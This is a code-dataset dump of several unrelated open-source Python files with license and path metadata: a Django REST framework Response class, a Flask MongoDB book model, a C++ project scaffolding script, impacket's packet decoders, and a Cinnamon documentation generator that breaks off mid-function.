from django.utils.six.moves.http_client import responses
from rest_framework.serializers import Serializer
class Response(SimpleTemplateResponse):
"""
An HttpResponse that allows its data to be rendered into
arbitrary media types.
"""
def __init__(self, data=None, status=None,
template_name=None, headers=None,
exception=False, content_type=None):
"""
Alters the init arguments slightly.
For example, drop 'template_name', and instead use 'data'.
Setting 'renderer' and 'media_type' will typically be deferred,
For example being set automatically by the `APIView`.
"""
super(Response, self).__init__(None, status=status)
if isinstance(data, Serializer):
msg = (
'You passed a Serializer instance as data, but '
'probably meant to pass serialized `.data` or '
'`.error`. representation.'
)
raise AssertionError(msg)
self.data = data
self.template_name = template_name
self.exception = exception
self.content_type = content_type
if headers:
for name, value in six.iteritems(headers):
self[name] = value
@property
def rendered_content(self):
renderer = getattr(self, 'accepted_renderer', None)
media_type = getattr(self, 'accepted_media_type', None)
context = getattr(self, 'renderer_context', None)
assert renderer, ".accepted_renderer not set on Response"
assert media_type, ".accepted_media_type not set on Response"
assert context, ".renderer_context not set on Response"
context['response'] = self
charset = renderer.charset
content_type = self.content_type
if content_type is None and charset is not None:
content_type = "{0}; charset={1}".format(media_type, charset)
elif content_type is None:
content_type = media_type
self['Content-Type'] = content_type
ret = renderer.render(self.data, media_type, context)
if isinstance(ret, six.text_type):
assert charset, (
'renderer returned unicode, and did not specify '
'a charset value.'
)
return bytes(ret.encode(charset))
if not ret:
del self['Content-Type']
return ret
@property
def status_text(self):
"""
Returns reason text corresponding to our HTTP response status code.
Provided for convenience.
"""
# TODO: Deprecate and use a template tag instead
# TODO: Status code text for RFC 6585 status codes
return responses.get(self.status_code, '')
def __getstate__(self):
"""
Remove attributes from the response that shouldn't be cached.
"""
state = super(Response, self).__getstate__()
for key in (
'accepted_renderer', 'renderer_context', 'resolver_match',
'client', 'request', 'json', 'wsgi_request'
):
if key in state:
del state[key]
state['_closable_objects'] = []
return state
| bsd-2-clause |
kawasaki2013/getting-started-python | 7-gce/bookshelf/model_mongodb.py | 9 | 2036 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from bson.objectid import ObjectId
from flask.ext.pymongo import PyMongo
builtin_list = list
mongo = PyMongo()
def _id(id):
if not isinstance(id, ObjectId):
return ObjectId(id)
return id
def from_mongo(data):
"""
Translates the MongoDB dictionary format into the format that's expected
by the application.
"""
if not data:
return None
data['id'] = str(data['_id'])
return data
def init_app(app):
mongo.init_app(app)
def list(limit=10, cursor=None):
cursor = int(cursor) if cursor else 0
results = mongo.db.books.find(skip=cursor, limit=10).sort('title')
books = builtin_list(map(from_mongo, results))
next_page = cursor + limit if len(books) == limit else None
return (books, next_page)
def list_by_user(user_id, limit=10, cursor=None):
cursor = int(cursor) if cursor else 0
results = mongo.db.books\
.find({'createdById': user_id}, skip=cursor, limit=10)\
.sort('title')
books = builtin_list(map(from_mongo, results))
next_page = cursor + limit if len(books) == limit else None
return (books, next_page)
def read(id):
result = mongo.db.books.find_one(_id(id))
return from_mongo(result)
def create(data):
new_id = mongo.db.books.insert(data)
return read(new_id)
def update(data, id):
mongo.db.books.update({'_id': _id(id)}, data)
return read(id)
def delete(id):
mongo.db.books.remove(_id(id))
| apache-2.0 |
bailey-lab/SeekDeep | scripts/cppProjectScripts/inProgress/createNewBibseqRing.py | 8 | 3286 | #!/usr/bin/env python2
import shutil, os, argparse, sys, stat,time
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-name', type=str, required = True)
parser.add_argument('-author', type=str, required = True)
parser.add_argument('-prepath', type=str, required = True)
return parser.parse_args()
def fileInfoHeader(headerName, author):
return """
// {headerName}
//
// Created by {author} on {date}.
// Copyright (c) {year} {author}. All rights reserved.
//
""".format(headerName=headerName, author=author,year=time.strftime("%Y"),date=time.strftime("%Y/%m/%d"))
def startHeader(headerName, author):
return """#pragma once
//
""" + fileInfoHeader(headerName, author)
def startCpp(nameStub, author):
return fileInfoHeader(nameStub + ".cpp", author) + """
#include "{name}.hpp"
""".format(name = nameStub)
def main():
args = parse_args()
name = args.name
prepath = args.prepath
if not prepath.endswith("/"):
prepath += "/"
if os.path.exists(name) or os.path.exists(name + ".h"):
print "Error, " + name + " already exists"
exit(1)
#create main dir
os.mkdir(name)
#create main header to include the ring
with open(name + ".h", "w") as f:
mainHeaderOut = startHeader( name + ".h", args.author) + """
#include "{prepath}{name}/{name}SetUp.hpp"
#include "{prepath}{name}/{name}Runner.hpp"
""".format(name=args.name,prepath = prepath)
f.write(mainHeaderOut)
#create setUp header
with open(os.path.join(name,name + "SetUp.hpp"), "w") as f:
defaultHeader = startHeader(name + "SetUp.hpp", args.author)
defaultHeader += """
#include <njhseq.h>
#include <njhseq/programUtils/seqSetUp.hpp>
#include <njhcpp.h>
namespace njhseq {{
class {name}SetUp : public seqSetUp {{
public:
using seqSetUp::seqSetUp;
}};
}} // namespace njhseq
""".format(name =name)
f.write(defaultHeader)
#create setUp cpp
with open(os.path.join(name,name + "SetUp.cpp"), "w") as f:
infoHeader = startCpp(name + "SetUp", args.author)
infoHeader +="""
namespace njhseq {
} // namespace njhseq
"""
f.write(infoHeader)
#create runner header
with open(os.path.join(name,name + "Runner.hpp"), "w") as f:
infoHeader = startHeader(name + "Runner.hpp", args.author)
infoHeader +="""
#include "{name}SetUp.hpp"
namespace njhseq {{
class {name}Runner : public njh::progutils::programRunner {{
public:
{name}Runner();
static int placeHolder(MapStrStr inputCommands);
}};
}} // namespace njhseq
""".format(name = name)
f.write(infoHeader)
#create runner cpp
with open(os.path.join(name,name + "Runner.cpp"), "w") as f:
infoHeader = startCpp(name + "Runner", args.author)
infoHeader +="""
namespace njhseq {{
{name}Runner::{name}Runner()
: njh::progutils::programRunner({{addFunc("placeHolder", placeHolder, false)}},
"{name}") {{}}
int {name}Runner::placeHolder(MapStrStr inputCommands) {{
{name}SetUp setUp(inputCommands);
setUp.finishSetUp(std::cout);
return 0;
}}
}} // namespace njhseq
""".format(name = name)
f.write(infoHeader)
main()
| lgpl-3.0 |
badreddinetahir/pwn_plug_sources | src/voiper/sulley/impacket/ImpactDecoder.py | 8 | 5509 | # Copyright (c) 2003-2006 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# $Id: ImpactDecoder.py,v 1.6 2006/05/23 22:25:34 gera Exp $
#
# Description:
# Convenience packet unpackers for various network protocols
# implemented in the ImpactPacket module.
#
# Author:
# Javier Burroni (javier)
# Bruce Leidl (brl)
import ImpactPacket
"""Classes to convert from raw packets into a hierarchy of
ImpactPacket derived objects.
The protocol of the outermost layer must be known in advance, and the
packet must be fed to the corresponding decoder. From there it will
try to decode the raw data into a hierarchy of ImpactPacket derived
objects; if a layer's protocol is unknown, all the remaining data will
be wrapped into a ImpactPacket.Data object.
"""
class Decoder:
def decode(self, aBuffer):
pass
class EthDecoder(Decoder):
def __init__(self):
pass
def decode(self, aBuffer):
e = ImpactPacket.Ethernet(aBuffer)
off = e.get_header_size()
if e.get_ether_type() == ImpactPacket.IP.ethertype:
self.ip_decoder = IPDecoder()
packet = self.ip_decoder.decode(aBuffer[off:])
elif e.get_ether_type() == ImpactPacket.ARP.ethertype:
self.arp_decoder = ARPDecoder()
packet = self.arp_decoder.decode(aBuffer[off:])
else:
self.data_decoder = DataDecoder()
packet = self.data_decoder.decode(aBuffer[off:])
e.contains(packet)
return e
# Linux "cooked" capture encapsulation.
# Used, for instance, for packets returned by the "any" interface.
class LinuxSLLDecoder(Decoder):
def __init__(self):
pass
def decode(self, aBuffer):
e = ImpactPacket.LinuxSLL(aBuffer)
off = 16
if e.get_ether_type() == ImpactPacket.IP.ethertype:
self.ip_decoder = IPDecoder()
packet = self.ip_decoder.decode(aBuffer[off:])
elif e.get_ether_type() == ImpactPacket.ARP.ethertype:
self.arp_decoder = ARPDecoder()
packet = self.arp_decoder.decode(aBuffer[off:])
else:
self.data_decoder = DataDecoder()
packet = self.data_decoder.decode(aBuffer[off:])
e.contains(packet)
return e
class IPDecoder(Decoder):
def __init__(self):
pass
def decode(self, aBuffer):
i = ImpactPacket.IP(aBuffer)
off = i.get_header_size()
if i.get_ip_p() == ImpactPacket.UDP.protocol:
self.udp_decoder = UDPDecoder()
packet = self.udp_decoder.decode(aBuffer[off:])
elif i.get_ip_p() == ImpactPacket.TCP.protocol:
self.tcp_decoder = TCPDecoder()
packet = self.tcp_decoder.decode(aBuffer[off:])
elif i.get_ip_p() == ImpactPacket.ICMP.protocol:
self.icmp_decoder = ICMPDecoder()
packet = self.icmp_decoder.decode(aBuffer[off:])
else:
self.data_decoder = DataDecoder()
packet = self.data_decoder.decode(aBuffer[off:])
i.contains(packet)
return i
class ARPDecoder(Decoder):
def __init__(self):
pass
def decode(self, aBuffer):
arp = ImpactPacket.ARP(aBuffer)
off = arp.get_header_size()
self.data_decoder = DataDecoder()
packet = self.data_decoder.decode(aBuffer[off:])
arp.contains(packet)
return arp
class UDPDecoder(Decoder):
def __init__(self):
pass
def decode(self, aBuffer):
u = ImpactPacket.UDP(aBuffer)
off = u.get_header_size()
self.data_decoder = DataDecoder()
packet = self.data_decoder.decode(aBuffer[off:])
u.contains(packet)
return u
class TCPDecoder(Decoder):
def __init__(self):
pass
def decode(self, aBuffer):
t = ImpactPacket.TCP(aBuffer)
off = t.get_header_size()
self.data_decoder = DataDecoder()
packet = self.data_decoder.decode(aBuffer[off:])
t.contains(packet)
return t
class IPDecoderForICMP(Decoder):
"""This class was added to parse the IP header of ICMP unreachables packets
If you use the "standard" IPDecoder, it might crash (see bug #4870) ImpactPacket.py
because the TCP header inside the IP header is incomplete"""
def __init__(self):
pass
def decode(self, aBuffer):
i = ImpactPacket.IP(aBuffer)
off = i.get_header_size()
if i.get_ip_p() == ImpactPacket.UDP.protocol:
self.udp_decoder = UDPDecoder()
packet = self.udp_decoder.decode(aBuffer[off:])
else:
self.data_decoder = DataDecoder()
packet = self.data_decoder.decode(aBuffer[off:])
i.contains(packet)
return i
class ICMPDecoder(Decoder):
def __init__(self):
pass
def decode(self, aBuffer):
ic = ImpactPacket.ICMP(aBuffer)
off = ic.get_header_size()
if ic.get_icmp_type() == ImpactPacket.ICMP.ICMP_UNREACH:
self.ip_decoder = IPDecoderForICMP()
packet = self.ip_decoder.decode(aBuffer[off:])
else:
self.data_decoder = DataDecoder()
packet = self.data_decoder.decode(aBuffer[off:])
ic.contains(packet)
return ic
class DataDecoder(Decoder):
def decode(self, aBuffer):
d = ImpactPacket.Data(aBuffer)
return d
| gpl-3.0 |
Kulmerov/Cinnamon | docs/reference/cinnamon-js/gen_lib.py | 14 | 26798 | # coding: utf-8
# Dear future self,
#
# You're looking at this file because
# the parse function finally broke.
#
# It's not fixable. You have to rewrite it.
# Sincerely, past self
#
# Also, it's probably at least
# 2013. Did you ever take
# that trip to Iceland?
import re
def get_type_link(typ, file):
from gen_doc import objects
if typ == '':
return "void"
else:
if typ in objects:
return "cinnamon-js-" + objects[typ].prefix
elif file.name + "." + typ in objects:
return "cinnamon-js-" + objects[file.name + "." + typ].prefix
elif typ.endswith("s") and typ[:-1] in objects:
return "cinnamon-js-" + objects[typ[:-1]].prefix
elif typ.endswith("s") and file.name + "." + typ[:-1] in objects:
return "cinnamon-js-" + objects[file.name + "." + typ[:-1]].prefix
elif typ.startswith("Gio"):
return typ.replace("Gio.", "G")
elif typ.startswith("GLib"):
return typ.replace("GLib.", "G")
else:
return typ.replace('.', '')
def markup(line, obj):
line = re.sub('@(\w*)', '<code>\g<1></code>', line)
line = re.sub('`([^`]*)`', '<code>\g<1></code>', line)
line = re.sub('\*\*([^*]*)\*\*', '<emphasis role="strong">\g<1></emphasis>', line)
line = re.sub('\*([^*]*)\*', '<emphasis>\g<1></emphasis>', line)
def format_type_link(match):
res = match.group(1)
return '<link linkend="{link}"><code>{name}</code></link>'.format(
link = get_type_link(res, obj.file),
name = res)
line = re.sub('#(([\w]*\.)?[\w]+)', format_type_link, line)
def format_ext_link(match):
if match.group(1):
full = match.group(1) + match.group(3)
else:
full = match.group(3)
if match.group(4):
full += match.group(4)
owner = match.group(1)
if owner:
owner = owner[:-1] # remove trailing .
else:
owner = "this"
thing = match.group(3)
from gen_doc import objects
object = None
if owner == "this":
object = obj.object
if owner in objects:
object = objects[owner]
elif obj.file.name + "." + owner in objects:
object = objects[obj.file.name + "." + owner]
if object is None:
return '<code>{name}</code>'.format(name = full)
func_names = [x.name for x in object.functions]
enum_names = [x.name for x in object.enums]
prop_names = [x.name for x in object.properties]
if thing in prop_names and not full.endswith("()"):
return '<link linkend="cinnamon-js-{prefix}--{thing}"><code>{full}</code></link>'.format(
prefix = object.prefix,
thing = thing,
full = full)
elif thing in func_names or (thing in enum_names and not full.endswith("()")):
return '<link linkend="cinnamon-js-{prefix}-{thing}"><code>{full}</code></link>'.format(
prefix = object.prefix,
thing = thing,
full = full)
else:
return '<code>{name}</code>'.format(name = full)
line = re.sub('%(([\w]+\.)?[\w]+\.)?([\w]+)(\(\))?', format_ext_link, line)
return line
class JSThing():
def append_description(self, desc):
self.description += desc.replace('<', '<').replace('>', '>')
def get_xml_description(self, description = None):
if description is None:
description = self.description
stuff = description.split('\n')
joined = ['']
in_code = False
in_list = False
for line in stuff:
if line.strip() == '```':
if in_code:
joined[-1] += '```'
joined.append('')
else:
if in_list:
joined[-1] += '\n```'
else:
joined.append('```\n')
in_code = not in_code
continue
if in_code:
joined[-1] += '\n' + line
continue
line = line.strip()
if line == '\\' and in_list:
joined[-1] += '\n\n'
elif len(line) == 0 or line == '\\':
# New line if empty
joined.append('')
in_list = False
else:
if joined[-1] == '' and line.startswith('- '):
in_list = True
if line.startswith('- '):
joined.append('')
joined[-1] += ' ' + line
description = ''
in_list = False
list_buffer = []
for line in joined:
if line.split('\n')[0].strip() == '```':
description += '<informalexample><programlisting>{0}</programlisting></informalexample>'\
.format(line.replace('```', ''))
continue
if line == '':
continue
line = line.strip()
if line.startswith('-'):
in_list = True
list_buffer.append(self.get_xml_description(line[1:]))
continue
if in_list:
description += '<itemizedlist>' + \
'\n'.join('<listitem>{0}</listitem>'.format(item) for item in list_buffer) + \
'</itemizedlist>'
list_buffer = []
in_list = False
line = markup(line, self)
description += '<para>{0}</para>'.format(line)
if in_list:
description += '<itemizedlist>' + \
'\n'.join('<listitem>{0}</listitem>'.format(item) for item in list_buffer) + \
'</itemizedlist>'
list_buffer = []
return description
def add_property(self, prop):
if prop.name == "short_description":
self.short_description = prop
else:
self.properties.append(prop)
prop.file = self.file
prop.object = self.object
class JSSignal(JSThing):
def __init__ (self, name):
self.name = name
self.description = ''
self.short_description = JSProperty(None, '', '')
self.properties = []
class JSFunction(JSThing):
def __init__ (self, name):
self.name = name
self.description = ''
self.short_description = JSProperty(None, '', '')
self.properties = []
self.return_value = JSProperty(None, '', '')
def set_return(self, retval):
self.return_value = retval
retval.file = self.file
retval.obj = self.object
class JSProperty(JSThing):
def __init__ (self, name, arg_type, desc):
self.name = name
self.arg_type = arg_type if arg_type else ''
self.description = ''
self.append_description(desc + "\n")
class JSFile(JSThing):
def __init__ (self, directory, name):
self.directory = directory
self.name = name[0].capitalize() + name[1:]
self.orig_name = self.name
self.imports = "imports.{0}.{1}".format(directory, name)
self.prefix = directory + "-" + name
self.description = ''
self.short_description = JSProperty(None, '', '')
self.properties = []
self.objects = []
self.signals = []
self.enums = []
self.functions = []
self.file = self
self.object = self
def is_interesting(self):
return len(self.functions) + len(self.properties) + len(self.description) > 0
def add_function(self, func):
self.functions.append(func)
func.file = self
func.object = self
def add_object(self, obj):
self.objects.append(obj)
obj.parent = self
obj.directory = self.directory
obj.prefix = self.prefix + "-" + obj.name
obj.name = self.name + "-" + obj.name
obj.file = self
def add_enum(self, obj):
self.enums.append(obj)
obj.parent = self
obj.directory = self.directory
obj.prefix = self.prefix + "-" + obj.name
obj.file = self
class JSObject(JSThing):
def __init__ (self, name):
self.name = name
self.orig_name = name
self.inherit = ''
self.description = ''
self.short_description = JSProperty(None, '', '')
self.parent = None
self.directory = None
self.prefix = None
self.functions = []
self.properties = []
self.signals = []
self.enums = []
self.object = self
def add_function(self, func):
self.functions.append(func)
func.file = self.file
func.object = self
def add_signal(self, signal):
self.signals.append(signal)
signal.file = self
signal.object = self
def set_inherit(self, inherit):
self.inherit = inherit
class JSEnum(JSThing):
def __init__ (self, name):
self.name = name
self.description = ''
self.short_description = JSProperty(None, '', '')
self.properties = []
self.object = self
SGML_FORMAT = '''\
<?xml version='1.0'?>
<!DOCTYPE book PUBLIC '-//OASIS//DTD DocBook XML V4.3//EN'
'http://www.oasis-open.org/docbook/xml/4.3/docbookx.dtd'
[
<!ENTITY % local.common.attrib "xmlns:xi CDATA #FIXED 'http://www.w3.org/2003/XInclude'">
]>
<book id='index'>
<bookinfo>
<title>Cinnamon Javascript Reference Manual</title>
<releaseinfo>
This document is for Cinnamon {version}.
The latest version of this documentation can be found online at <ulink role="online-location" url="http://developer.linuxmint.com/reference/git/cinnamon-js/">http://developer.linuxmint.com/reference/git/cinnamon-js/</ulink>.
</releaseinfo>
</bookinfo>
{chapters}
</book>'''
SGML_CHAPTER_FORMAT = '''
<chapter id="cinnamon-js-{prefix}-section">
<title>{title}</title>
{entries}
</chapter>'''
SGML_ENTRY_FORMAT = '<xi:include href="{directory}/{name}.xml"/>'
FILE_FORMAT = '''\
<?xml version='1.0'?>
<!DOCTYPE refentry PUBLIC '-//OASIS//DTD DocBook XML V4.3//EN'
'http://www.oasis-open.org/docbook/xml/4.3/docbookx.dtd'
[
<!ENTITY % local.common.attrib "xmlns:xi CDATA #FIXED 'http://www.w3.org/2003/XInclude'">
]>
<refentry id="cinnamon-js-{prefix}">
<refmeta>
<refentrytitle role="top_of_page" id="cinnamon-js-{prefix}.top_of_page">{name}</refentrytitle>
<manvolnum>3</manvolnum>
<refmiscinfo>
{name}
</refmiscinfo>
</refmeta>
<refnamediv>
<refname>{name}</refname>
<refpurpose>{short_description}</refpurpose>
</refnamediv>
{func_header}
{prop_header}
{signal_header}
{enum_header}
{hierarchy}
{description}
{functions}
{properties}
{signals}
{enums}
</refentry>
'''
FUNCTION_HEADER_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.functions" role="functions_proto">
<title role="functions_proto.title">Functions</title>
<informaltable pgwide="1" frame="none">
<tgroup cols="2">
<colspec colname="functions_return" colwidth="150px"/>
<colspec colname="functions_name"/>
<tbody>
{function_headers}
</tbody>
</tgroup>
</informaltable>
</refsect1>
'''
FUNCTION_HEADER_ITEM_FORMAT = '''
<row>
<entry role="function_type">
<link linkend="{return_link}">
<returnvalue>{return_name}</returnvalue>
</link>
</entry>
<entry role="function_name">
<link linkend="cinnamon-js-{prefix}-{name}">{name}</link> <phrase role="c_punctuation">()</phrase>
</entry>
</row>
'''
PROPERTY_HEADER_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.properties" role="properties">
<title role="properties.title">Properties</title>
<informaltable frame="none">
<tgroup cols="3">
<colspec colname="properties_type" colwidth="150px"/>
<colspec colname="properties_name" colwidth="300px"/>
<tbody>
{property_headers}
</tbody>
</tgroup>
</informaltable>
</refsect1>
'''
SIGNAL_HEADER_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.signals" role="signal_proto">
<title role="signal_proto.title">Signals</title>
<informaltable frame="none">
<tgroup cols="3">
<colspec colname="signals_return" colwidth="150px" />
<colspec colname="signals_name" colwidth="300px" />
<tbody>
{signal_headers}
</tbody>
</tgroup>
</informaltable>
</refsect1>
'''
SIGNAL_HEADER_ITEM_FORMAT = '''
<row>
<entry role="signal_type">
</entry>
<entry role="signal_name">
<link linkend="cinnamon-js-{prefix}-{name}-signal">{name}</link>
</entry>
</row>
'''
ENUM_HEADER_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.other" role="other_proto">
<title role="other_proto.title">Types and Values</title>
<informaltable role="enum_members_table" pgwide="1" frame="none">
<tgroup cols="2">
<colspec colname="name" colwidth="150px"/>
<colspec colname="description"/>
<tbody>
{enum_headers}
</tbody>
</tgroup>
</informaltable>
</refsect1>
'''
ENUM_HEADER_ITEM_FORMAT = '''
<row>
<entry role="datatype_keyword">enum</entry>
<entry role="function_name">
<link linkend="cinnamon-js-{prefix}-{name}">{name}</link>
</entry>
</row>
'''
PROPERTY_HEADER_ITEM_FORMAT = '''
<row>
<entry role="property_type">
<link linkend="{type_link}"><type>{type_name}</type></link>
</entry>
<entry role="property_name">
<link linkend="cinnamon-js-{prefix}--{name}">{name}</link>
</entry>
</row>
'''
HIERARCHY_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.object-hierarchy" role="object_hierarchy">
<title role="object_hierarchy.title">Object Hierarchy</title>
<screen>
<link linkend="Object">Object</link>
{hierarchy}
</screen>
</refsect1>
'''
HIERARCHY_ITEM_FORMAT = '{spacing}<phrase role="lineart">╰──</phrase> <link linkend="cinnamon-js-{prefix}">{name}</link>'
DESCRIPTION_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.description" role="desc">
<title role="desc.title">Description</title>
{description}
</refsect1>
'''
FUNCTIONS_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.functions_details" role="details">
<title role="details.title">Functions</title>
{functions}
</refsect1>
'''
FUNCTION_ITEM_FORMAT = '''
<refsect2 id="cinnamon-js-{prefix}-{name}" role="function">
<title>{name} ()</title>
<indexterm zone="cinnamon-js-{prefix}-{name}"><primary>{name}</primary></indexterm>
<programlisting language="javascript">
<link linkend="{return_link}"><returnvalue>{return_type}</returnvalue></link>
{name} ({inline_params});</programlisting>
{description}
{params}
{return_desc}
</refsect2>
'''
SIGNALS_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.signal-details" role="details">
<title role="details.title">Signal details</title>
{signals}
</refsect1>
'''
SIGNAL_ITEM_FORMAT = '''
<refsect2 id="cinnamon-js-{prefix}-{name}-signal" role="signal">
<title>The <literal>“{name}”</literal> signal</title>
<indexterm zone="cinnamon-js-{prefix}-{name}-signal"><primary>{prefix}::{name}</primary></indexterm>
<programlisting language="javascript">
user_function ({inline_params});</programlisting>
{description}
{params}
</refsect2>
'''
FUNC_PARAMETERS_FORMAT = '''
<refsect3 role="parameters">
<title>Parameters</title>
<informaltable role="parameters_table" pgwide="1" frame="none">
<tgroup cols="3">
<colspec colname="parameters_name" colwidth="150px"/>
<colspec colname="parameters_description"/>
<colspec colname="parameters_annotations" colwidth="200px"/>
<tbody>
{param_items}
</tbody>
</tgroup>
</informaltable>
</refsect3>
'''
INLINE_PARAMETER_FORMAT = '<parameter><link linkend="{type_link}"><type>{type_name}</type></link>{name}</parameter>'
FUNC_PARAMETERS_ITEM_FORMAT = '''
<row>
<entry role="parameter_name"><para>{name}</para></entry>
<entry role="parameter_description">{description}</entry>
<entry role="parameter_annotations"></entry>
</row>
'''
FUNC_RETURN_FORMAT = '''
<refsect3 role="returns">
<title>Returns</title>
{desc}
</refsect3>
'''
PROPERTIES_FORMAT = '''
<refsect1 id="cinnamon-js-{prefix}.property-details" role="property_details">
<title role="property_details.title">Property Details</title>
{properties}
</refsect1>
'''
PROPERTIES_ITEM_FORMAT = '''
<refsect2 id="cinnamon-js-{prefix}--{name}" role="property">
<title>The <literal>“{name}”</literal> property</title>
<indexterm zone="cinnamon-js-{prefix}--{name}">
<primary>cinnamon-js-{prefix}:{name}</primary>
</indexterm>
<programlisting> {disp_name} <link linkend="{type_link}"><type>{type_name}</type></link></programlisting>
{description}
</refsect2>
'''
ENUMS_FORMAT = '''
<refsect1 id="CinnamonGlobal.other_details" role="details">
<title role="details.title">Types and Values</title>
{enums}
</refsect1>
'''
ENUMS_ITEM_FORMAT = '''
<refsect2 id="cinnamon-js-{prefix}" role="enum">
<title>enum {name}</title>
<indexterm zone="{name}"><primary>{name}</primary></indexterm>
{description}
<refsect3 role="enum_members">
<title>Members</title>
<informaltable role="enum_members_table" pgwide="1" frame="none">
<tgroup cols="2">
<colspec colname="enum_members_name" colwidth="300px"/>
<colspec colname="enum_members_description"/>
<tbody>
{enum_items}
</tbody>
</tgroup>
</informaltable>
</refsect3>
</refsect2>
'''
ENUMS_ITEM_ROW_FORMAT = '''
<row role="constant">
<entry role="enum_member_name"><para id="{name}:CAPS">{name}</para></entry>
<entry role="enum_member_description">{description}</entry>
</row>
'''
def write_sgml(files, version):
sgml = open('cinnamon-js-docs.sgml', 'w')
chapters = []
for _file in files:
if not _file.is_interesting() and len(_file.objects) == 0:
continue
entries = []
if _file.is_interesting():
_file.objects.insert(0, _file)
entries = [SGML_ENTRY_FORMAT.format(
directory = _file.directory,
name = obj.name) for obj in _file.objects]
chapters.append(SGML_CHAPTER_FORMAT.format(
prefix = _file.prefix,
title = _file.imports,
entries = "\n".join(entries)))
sgml.write(SGML_FORMAT.format(
version = version,
chapters = "\n".join(chapters)))
def create_file(obj):
file_obj = open('{0}/{1}.xml'.format(obj.directory, obj.name), 'w')
short_description = obj.short_description.description.replace("\n", " ").strip()
file_obj.write(FILE_FORMAT.format(
prefix = obj.prefix,
name = obj.name.replace("-", "."),
short_description = markup(short_description, obj),
func_header = get_function_header(obj),
signal_header = get_signal_header(obj),
prop_header = get_properties_header(obj),
enum_header = get_enum_header(obj),
hierarchy = get_hierarchy(obj),
description = get_description(obj),
functions = get_functions(obj),
signals = get_signals(obj),
properties = get_properties(obj),
enums = get_enums(obj)))
file_obj.close()
def get_function_header(obj):
if len(obj.functions) == 0:
return ""
functions = [FUNCTION_HEADER_ITEM_FORMAT.format(
return_link = get_type_link(func.return_value.arg_type, obj.file),
return_name = func.return_value.arg_type,
prefix = obj.prefix,
name = func.name) for func in obj.functions]
return FUNCTION_HEADER_FORMAT.format(
prefix = obj.prefix,
function_headers = "\n".join(functions))
def get_signal_header(obj):
if len(obj.signals) == 0:
return ""
signals = [SIGNAL_HEADER_ITEM_FORMAT.format(
prefix = obj.prefix,
name = sig.name) for sig in obj.signals]
return SIGNAL_HEADER_FORMAT.format(
prefix = obj.prefix,
signal_headers = "\n".join(signals))
def get_properties_header(obj):
if len(obj.properties) == 0:
return ""
properties = [PROPERTY_HEADER_ITEM_FORMAT.format(
type_link = get_type_link(prop.arg_type, obj.file),
type_name = prop.arg_type,
prefix = obj.prefix,
name = prop.name) for prop in obj.properties]
return PROPERTY_HEADER_FORMAT.format(
prefix = obj.prefix,
property_headers = "\n".join(properties))
def get_enum_header(obj):
if len(obj.enums) == 0:
return ""
enums = [ENUM_HEADER_ITEM_FORMAT.format(
prefix = obj.prefix,
name = enum.name) for enum in obj.enums]
return ENUM_HEADER_FORMAT.format(
prefix = obj.prefix,
enum_headers = "\n".join(enums))
def get_hierarchy(obj):
from gen_doc import objects
if isinstance(obj, JSFile):
return ""
name = obj.name.replace('-', '.')
hierarchy = []
try:
while True:
name = objects[name].inherit
if name in hierarchy:
break
if name:
hierarchy.insert(0, name)
except KeyError:
pass
count = 1
hierarchy_strs = []
for item in hierarchy:
try:
hierarchy_strs.append(HIERARCHY_ITEM_FORMAT.format(
spacing = ' ' * count * 4,
prefix = objects[item].prefix,
name = item))
except KeyError:
hierarchy_strs.append(HIERARCHY_ITEM_FORMAT.format(
spacing = ' ' * count * 4,
prefix = "void",
name = item))
count += 1
hierarchy_strs.append(HIERARCHY_ITEM_FORMAT.format(
spacing = ' ' * count * 4,
prefix = "void",
name = obj.name.replace('-', '.')))
return HIERARCHY_FORMAT.format(
prefix = obj.prefix,
hierarchy = "\n".join(hierarchy_strs))
def get_description(obj):
if len(obj.description) == 0:
return ""
return DESCRIPTION_FORMAT.format(
prefix=obj.prefix,
description = obj.get_xml_description())
def get_functions(obj):
if len(obj.functions) == 0:
return ""
functions = []
for func in obj.functions:
inline_params = ""
params = ""
if len(func.properties) > 0:
# Calculate how long the argument types are and make the arguments
# align
max_length = max(len(x.arg_type) for x in func.properties) + 3
# If no parameter has argument types, don't show that silly
# whitespace
if max_length == 3:
max_length = 0
inline_params = [INLINE_PARAMETER_FORMAT.format(
type_link = get_type_link(param.arg_type, obj.file),
type_name = param.arg_type,
name = " " * (max_length - len(param.arg_type)) + param.name) for param in func.properties]
inline_params = (',\n' + ' ' * (len(func.name) + 2)).join(inline_params)
params = [FUNC_PARAMETERS_ITEM_FORMAT.format(
name = param.name,
description = param.get_xml_description()) for param in func.properties]
params = FUNC_PARAMETERS_FORMAT.format(param_items = '\n'.join(params))
return_desc = ""
if func.return_value.name is not None:
return_desc = FUNC_RETURN_FORMAT.format(desc=func.return_value.get_xml_description())
functions.append(FUNCTION_ITEM_FORMAT.format(
prefix = obj.prefix,
name = func.name,
return_link = get_type_link(func.return_value.arg_type, obj.file),
return_type = func.return_value.arg_type,
description = func.get_xml_description(),
inline_params = inline_params,
params = params,
return_desc = return_desc))
return FUNCTIONS_FORMAT.format(
prefix = obj.prefix,
functions = "\n".join(functions))
def get_signals(obj):
if len(obj.signals) == 0:
return ""
signals = []
for sig in obj.signals:
inline_params = ""
params = ""
if len(sig.properties) > 0:
# Calculate how long the argument types are and make the arguments
# align
max_length = max(len(x.arg_type) for x in sig.properties) + 3
# If no parameter has argument types, don't show that silly
# whitespace
if max_length == 3:
max_length = 0
inline_params = [INLINE_PARAMETER_FORMAT.format(
type_link = get_type_link(param.arg_type, obj.file),
type_name = param.arg_type,
name = " " * (max_length - len(param.arg_type)) + param.name) for param in sig.properties]
inline_params = (',\n' + ' ' * (len(sig.name) + 2)).join(inline_params)
